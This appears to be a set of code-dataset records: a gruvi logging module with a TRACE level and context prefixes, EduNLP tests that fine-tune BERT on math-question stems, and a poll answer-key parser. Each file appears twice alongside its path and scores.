# only get logging information if needed (at the DEBUG level or higher), so we
# can disable collecting it for every call.
logging._srcfile = None
def get_logger(context=None, name=None):
"""Return a logger for *context*.
Return a :class:`ContextLogger` instance. The instance implements the
standard library's :class:`logging.Logger` interface.
"""
# Many class instances have their own logger. Share them to save memory if
# possible, i.e. when *context* is not set.
if name is None:
name = _logger_name
if context is None and name in _logger_dict:
return _logger_dict[name]
if context is not None and not isinstance(context, six.string_types):
context = util.objref(context)
logger = logging.getLogger(name)
logger = ContextLogger(logger, context)
if context is None:
_logger_dict[name] = logger
return logger
class ContextLogger(object):
"""A logger adapter that prepends a context string to log messages.
It also supports passing arguments via '{}' format operations.
"""
__slots__ = ('_logger', '_context')
# This is not based on logging.LoggingAdapter because the 2.x and 3.x
# implementations differ quite a bit, which means we would need to
# reimplement almost the entire thing anyway.
def __init__(self, logger, context=None):
self._logger = logger
self._context = context or ''
@property
def context(self):
"""Return the logging context."""
return self._context
def thread_info(self):
"""Return a string identifying the current thread and fiber."""
tid = threading.current_thread().name
if tid == 'MainThread':
tid = 'Main'
current = fibers.current()
fid = getattr(current, 'name') if current.parent else 'Root'
return '{}/{}'.format(tid, fid)
def frame_info(self):
"""Return a string identifying the current frame."""
if not self._logger.isEnabledFor(logging.DEBUG):
return ''
f = sys._getframe(3)
fname = os.path.split(f.f_code.co_filename)[1]
return '{}:{}'.format(fname, f.f_lineno)
def log(self, level, msg, *args, **kwargs):
if not self._logger.isEnabledFor(level):
return
prefix = '{}|{}|{}'.format(self.thread_info(), self.context or '-', self.frame_info())
if args:
msg = msg.format(*args)
msg = '[{}] {}'.format(prefix, msg)
self._logger._log(level, msg, (), **kwargs)
def trace(self, msg, *args, **kwargs):
self.log(logging.TRACE, msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.log(logging.WARNING, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
self.log(logging.CRITICAL, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
kwargs['exc_info'] = True
self.log(logging.ERROR, msg, *args, **kwargs) | lib/gruvi/logging.py |
from __future__ import absolute_import, print_function
import os
import sys
import logging
import threading
import fibers
import six
from . import util
__all__ = ['get_logger']
# Add a new level: TRACE.
logging.TRACE = 5
assert logging.NOTSET < logging.TRACE < logging.DEBUG
logging.addLevelName('TRACE', logging.TRACE)
_logger_name = 'gruvi'
_logger_dict = {}
# The logging module documents this slight hack to disable finding caller
# information (via sys._getframe()) for every logging call. In our logger we
# only get logging information if needed (at the DEBUG level or higher), so we
# can disable collecting it for every call.
logging._srcfile = None
def get_logger(context=None, name=None):
"""Return a logger for *context*.
Return a :class:`ContextLogger` instance. The instance implements the
standard library's :class:`logging.Logger` interface.
"""
# Many class instances have their own logger. Share them to save memory if
# possible, i.e. when *context* is not set.
if name is None:
name = _logger_name
if context is None and name in _logger_dict:
return _logger_dict[name]
if context is not None and not isinstance(context, six.string_types):
context = util.objref(context)
logger = logging.getLogger(name)
logger = ContextLogger(logger, context)
if context is None:
_logger_dict[name] = logger
return logger
class ContextLogger(object):
"""A logger adapter that prepends a context string to log messages.
It also supports passing arguments via '{}' format operations.
"""
__slots__ = ('_logger', '_context')
# This is not based on logging.LoggingAdapter because the 2.x and 3.x
# implementations differ quite a bit, which means we would need to
# reimplement almost the entire thing anyway.
def __init__(self, logger, context=None):
self._logger = logger
self._context = context or ''
@property
def context(self):
"""Return the logging context."""
return self._context
def thread_info(self):
"""Return a string identifying the current thread and fiber."""
tid = threading.current_thread().name
if tid == 'MainThread':
tid = 'Main'
current = fibers.current()
fid = getattr(current, 'name') if current.parent else 'Root'
return '{}/{}'.format(tid, fid)
def frame_info(self):
"""Return a string identifying the current frame."""
if not self._logger.isEnabledFor(logging.DEBUG):
return ''
f = sys._getframe(3)
fname = os.path.split(f.f_code.co_filename)[1]
return '{}:{}'.format(fname, f.f_lineno)
def log(self, level, msg, *args, **kwargs):
if not self._logger.isEnabledFor(level):
return
prefix = '{}|{}|{}'.format(self.thread_info(), self.context or '-', self.frame_info())
if args:
msg = msg.format(*args)
msg = '[{}] {}'.format(prefix, msg)
self._logger._log(level, msg, (), **kwargs)
def trace(self, msg, *args, **kwargs):
self.log(logging.TRACE, msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.log(logging.WARNING, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
self.log(logging.CRITICAL, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
kwargs['exc_info'] = True
self.log(logging.ERROR, msg, *args, **kwargs) | 0.645455 | 0.11808 |
import torch
import numpy as np
import pytest
from EduNLP.Pretrain import BertTokenizer, finetune_bert
from EduNLP.Vector import BertModel, T2V
from EduNLP.I2V import Bert, get_pretrained_i2v
@pytest.fixture(scope="module")
def stem_data_bert(data):
test_items = [
{'stem': '有公式$\\FormFigureID{wrong1?}$和公式$\\FormFigureBase64{wrong2?}$,\
如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$,若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'},
{'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
]
data = test_items + data
_data = []
tokenizer = BertTokenizer()
for e in data[:10]:
d = tokenizer(e["stem"])
if d is not None:
_data.append(d)
assert _data
return _data
def test_bert_without_param(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
finetune_bert(
stem_data_bert,
output_dir
)
tokenizer = BertTokenizer(output_dir)
model = BertModel(output_dir)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
inputs = tokenizer(item['stem'], return_tensors='pt')
output = model(inputs)
assert model.vector_size > 0
assert output.shape[-1] == model.vector_size
t2v = T2V('bert', output_dir)
assert t2v(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_vector(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_tokens(inputs).shape[-1] == t2v.vector_size
def test_bert_i2v(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
train_params = {
'epochs': 1,
'save_steps': 100,
'batch_size': 8,
'logging_steps': 3
}
finetune_bert(
stem_data_bert,
output_dir,
train_params=train_params
)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
tokenizer_kwargs = {"pretrain_model": output_dir}
i2v = Bert('bert', 'bert', output_dir, tokenizer_kwargs=tokenizer_kwargs)
i_vec, t_vec = i2v([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
assert len(t_vec[0][0]) == i2v.vector_size
i_vec = i2v.infer_item_vector([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
t_vec = i2v.infer_token_vector([item['stem'], item['stem']])
assert len(t_vec[0][0]) == i2v.vector_size | tests/test_vec/test_bert.py | import torch
import numpy as np
import pytest
from EduNLP.Pretrain import BertTokenizer, finetune_bert
from EduNLP.Vector import BertModel, T2V
from EduNLP.I2V import Bert, get_pretrained_i2v
@pytest.fixture(scope="module")
def stem_data_bert(data):
test_items = [
{'stem': '有公式$\\FormFigureID{wrong1?}$和公式$\\FormFigureBase64{wrong2?}$,\
如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$,若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'},
{'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
]
data = test_items + data
_data = []
tokenizer = BertTokenizer()
for e in data[:10]:
d = tokenizer(e["stem"])
if d is not None:
_data.append(d)
assert _data
return _data
def test_bert_without_param(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
finetune_bert(
stem_data_bert,
output_dir
)
tokenizer = BertTokenizer(output_dir)
model = BertModel(output_dir)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
inputs = tokenizer(item['stem'], return_tensors='pt')
output = model(inputs)
assert model.vector_size > 0
assert output.shape[-1] == model.vector_size
t2v = T2V('bert', output_dir)
assert t2v(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_vector(inputs).shape[-1] == t2v.vector_size
assert t2v.infer_tokens(inputs).shape[-1] == t2v.vector_size
def test_bert_i2v(stem_data_bert, tmpdir):
output_dir = str(tmpdir.mkdir('finetuneBert'))
train_params = {
'epochs': 1,
'save_steps': 100,
'batch_size': 8,
'logging_steps': 3
}
finetune_bert(
stem_data_bert,
output_dir,
train_params=train_params
)
item = {'stem': '如图$\\FigureID{088f15ea-8b7c-11eb-897e-b46bfc50aa29}$, \
若$x,y$满足约束条件$\\SIFSep$,则$z=x+7 y$的最大值为$\\SIFBlank$'}
tokenizer_kwargs = {"pretrain_model": output_dir}
i2v = Bert('bert', 'bert', output_dir, tokenizer_kwargs=tokenizer_kwargs)
i_vec, t_vec = i2v([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
assert len(t_vec[0][0]) == i2v.vector_size
i_vec = i2v.infer_item_vector([item['stem'], item['stem']])
assert len(i_vec[0]) == i2v.vector_size
t_vec = i2v.infer_token_vector([item['stem'], item['stem']])
assert len(t_vec[0][0]) == i2v.vector_size | 0.495117 | 0.459622 |
import pandas as pd
import Poll
import re
class Answer ():
def __init__(self, questionText, answer):
self.questionText = questionText
self.answer = answer
def getNumbers(self, str):
array = re.findall(r'[0-9]+', str)
return array
def read_and_assign_answerkey(self, answerkeyPolls,name,QuestionTypes,AllAnswerTextIncludes,AllPollTextIncludes,AnswerKeyCont):
whichRow = 0
numOfAllPolls = 0
inWhichPoll = -1
PollsA = []
pollname = ""
pollNumber = 0
polllength = 0
inWhichQuestion = -1
pollquestions = ""
pollanswers = []
pollanswersForEachQuestion = []
inputAnswer=Answer("","")
try:
file = open(name+AnswerKeyCont, "r", encoding="utf-8")
for i in file: # Tıpkı listeler gibi dosyanın her bir satırı üzerinde geziniyoruz.
if i != "\n":
if whichRow == 0:
str = i
str = inputAnswer.getNumbers(str)
numOfAllPolls = str[0]
elif AllPollTextIncludes[0] and AllPollTextIncludes[1] in i:
inWhichPoll += 1
if inWhichQuestion != -1 and inWhichPoll != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
if inWhichPoll != 0:
poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
PollsA.append(poll)
pollanswers = []
polllength = 0
pollname = ""
inWhichQuestion = -1
str = i
str = str.split(":")
pollNumber = str[0].split()
pollNumber = pollNumber[-1]
str = str[1].split("\t")
pollname = str[0]
str = str[1].split()
polllength = str[0]
elif (QuestionTypes[0] in i) or (QuestionTypes[1] in i):
inWhichQuestion += 1
if inWhichQuestion != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
str = i
str = str.split(". ", 1)
if QuestionTypes[0] in str[1]:
str = str[1].split(QuestionTypes[0])
elif QuestionTypes[1] in str[1]:
str = str[1].split(QuestionTypes[1])
pollquestions = str[0]
elif AllAnswerTextIncludes[0] and AllAnswerTextIncludes[1] in i:
str = i
str = str.split(" ", 2)
str = str[2].split("\n")
pollanswersForEachQuestion.append(str[0])
else:
str = i
str = inputAnswer.getNumbers(str)
whichRow += 1
file.close()
except FileNotFoundError:
print("File is not found....")
if (inWhichQuestion != -1) and inWhichPoll != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
if inWhichPoll != 0:
poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
PollsA.append(poll)
answerkeyPolls=PollsA
return answerkeyPolls
# READ QUESTIONS AND ANSWERS OF THE QUESTION POLL
def isInsideInAnswerkeyPolls(self, answerkeyPolls, first_question_text):
first_question_text = first_question_text.replace("\n","")
first_question_text = first_question_text.replace("\t", "")
first_question_text = first_question_text.replace(" ", "")
first_question_text = re.sub("[^0-9a-zA-Z]+", "",first_question_text)
iter=-1
k=0
while k<len(answerkeyPolls):
d=0
while d < len(answerkeyPolls[k].answers):
question = answerkeyPolls[k].answers[d].questionText.replace("\n", "")
question = question.replace("\t", "")
question = question.replace(" ", "")
question = re.sub("[^0-9a-zA-Z]+", "", question)
if question == first_question_text:
#print(answerkeyPolls[k].answers[d].questionText)
iter = k
break
d += 1
k += 1
if iter == k-1:
break
return iter
def assignPoll(self, Polls, answerkeyPolls, column, IndexOfanswerkeyPolls,dateofpoll,students):
w = 0
answers = []
pollName = answerkeyPolls[IndexOfanswerkeyPolls].pollName
answerLength = int(answerkeyPolls[IndexOfanswerkeyPolls].answerLength)
pollNumber = int(answerkeyPolls[IndexOfanswerkeyPolls].pollNumber)
while w < answerLength:
questionsInPoll = column[4 + w * 2].replace("\n","")
questionsInPoll = questionsInPoll.replace(" ", "")
questionsInPoll = questionsInPoll.replace("\t", "")
questionsInPoll = re.sub("[^0-9a-zA-Z]+", "", questionsInPoll)
g = 0
while g < len(answerkeyPolls[IndexOfanswerkeyPolls].answers):
answerkeyquestionText = answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText.replace("\n", "")
answerkeyquestionText = answerkeyquestionText.replace(" ", "")
answerkeyquestionText = answerkeyquestionText.replace("\t", "")
answerkeyquestionText = re.sub("[^0-9a-zA-Z]+", "", answerkeyquestionText)
if questionsInPoll == answerkeyquestionText:
answer = Answer(answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText, answerkeyPolls[IndexOfanswerkeyPolls].answers[g].answer)
answers.append(answer)
g += 1
w += 1
poll = Poll.Poll(answerLength, answers, pollName, pollNumber)
dateofpoll.append(" ")
k=0
while k <len(students):
students[k].answerof.append([])
k=k+1
Polls.append(poll)
return Polls | Answer.py | import pandas as pd
import Poll
import re
class Answer ():
def __init__(self, questionText, answer):
self.questionText = questionText
self.answer = answer
def getNumbers(self, str):
array = re.findall(r'[0-9]+', str)
return array
def read_and_assign_answerkey(self, answerkeyPolls,name,QuestionTypes,AllAnswerTextIncludes,AllPollTextIncludes,AnswerKeyCont):
whichRow = 0
numOfAllPolls = 0
inWhichPoll = -1
PollsA = []
pollname = ""
pollNumber = 0
polllength = 0
inWhichQuestion = -1
pollquestions = ""
pollanswers = []
pollanswersForEachQuestion = []
inputAnswer=Answer("","")
try:
file = open(name+AnswerKeyCont, "r", encoding="utf-8")
for i in file: # Tıpkı listeler gibi dosyanın her bir satırı üzerinde geziniyoruz.
if i != "\n":
if whichRow == 0:
str = i
str = inputAnswer.getNumbers(str)
numOfAllPolls = str[0]
elif AllPollTextIncludes[0] and AllPollTextIncludes[1] in i:
inWhichPoll += 1
if inWhichQuestion != -1 and inWhichPoll != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
if inWhichPoll != 0:
poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
PollsA.append(poll)
pollanswers = []
polllength = 0
pollname = ""
inWhichQuestion = -1
str = i
str = str.split(":")
pollNumber = str[0].split()
pollNumber = pollNumber[-1]
str = str[1].split("\t")
pollname = str[0]
str = str[1].split()
polllength = str[0]
elif (QuestionTypes[0] in i) or (QuestionTypes[1] in i):
inWhichQuestion += 1
if inWhichQuestion != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
str = i
str = str.split(". ", 1)
if QuestionTypes[0] in str[1]:
str = str[1].split(QuestionTypes[0])
elif QuestionTypes[1] in str[1]:
str = str[1].split(QuestionTypes[1])
pollquestions = str[0]
elif AllAnswerTextIncludes[0] and AllAnswerTextIncludes[1] in i:
str = i
str = str.split(" ", 2)
str = str[2].split("\n")
pollanswersForEachQuestion.append(str[0])
else:
str = i
str = inputAnswer.getNumbers(str)
whichRow += 1
file.close()
except FileNotFoundError:
print("File is not found....")
if (inWhichQuestion != -1) and inWhichPoll != 0:
answer = Answer(pollquestions, pollanswersForEachQuestion)
pollanswers.append(answer)
pollquestions = ""
pollanswersForEachQuestion = []
if inWhichPoll != 0:
poll = Poll.Poll(polllength, pollanswers, pollname, pollNumber)
PollsA.append(poll)
answerkeyPolls=PollsA
return answerkeyPolls
# READ QUESTIONS AND ANSWERS OF THE QUESTION POLL
def isInsideInAnswerkeyPolls(self, answerkeyPolls, first_question_text):
first_question_text = first_question_text.replace("\n","")
first_question_text = first_question_text.replace("\t", "")
first_question_text = first_question_text.replace(" ", "")
first_question_text = re.sub("[^0-9a-zA-Z]+", "",first_question_text)
iter=-1
k=0
while k<len(answerkeyPolls):
d=0
while d < len(answerkeyPolls[k].answers):
question = answerkeyPolls[k].answers[d].questionText.replace("\n", "")
question = question.replace("\t", "")
question = question.replace(" ", "")
question = re.sub("[^0-9a-zA-Z]+", "", question)
if question == first_question_text:
#print(answerkeyPolls[k].answers[d].questionText)
iter = k
break
d += 1
k += 1
if iter == k-1:
break
return iter
def assignPoll(self, Polls, answerkeyPolls, column, IndexOfanswerkeyPolls,dateofpoll,students):
w = 0
answers = []
pollName = answerkeyPolls[IndexOfanswerkeyPolls].pollName
answerLength = int(answerkeyPolls[IndexOfanswerkeyPolls].answerLength)
pollNumber = int(answerkeyPolls[IndexOfanswerkeyPolls].pollNumber)
while w < answerLength:
questionsInPoll = column[4 + w * 2].replace("\n","")
questionsInPoll = questionsInPoll.replace(" ", "")
questionsInPoll = questionsInPoll.replace("\t", "")
questionsInPoll = re.sub("[^0-9a-zA-Z]+", "", questionsInPoll)
g = 0
while g < len(answerkeyPolls[IndexOfanswerkeyPolls].answers):
answerkeyquestionText = answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText.replace("\n", "")
answerkeyquestionText = answerkeyquestionText.replace(" ", "")
answerkeyquestionText = answerkeyquestionText.replace("\t", "")
answerkeyquestionText = re.sub("[^0-9a-zA-Z]+", "", answerkeyquestionText)
if questionsInPoll == answerkeyquestionText:
answer = Answer(answerkeyPolls[IndexOfanswerkeyPolls].answers[g].questionText, answerkeyPolls[IndexOfanswerkeyPolls].answers[g].answer)
answers.append(answer)
g += 1
w += 1
poll = Poll.Poll(answerLength, answers, pollName, pollNumber)
dateofpoll.append(" ")
k=0
while k <len(students):
students[k].answerof.append([])
k=k+1
Polls.append(poll)
return Polls | 0.048597 | 0.11928 |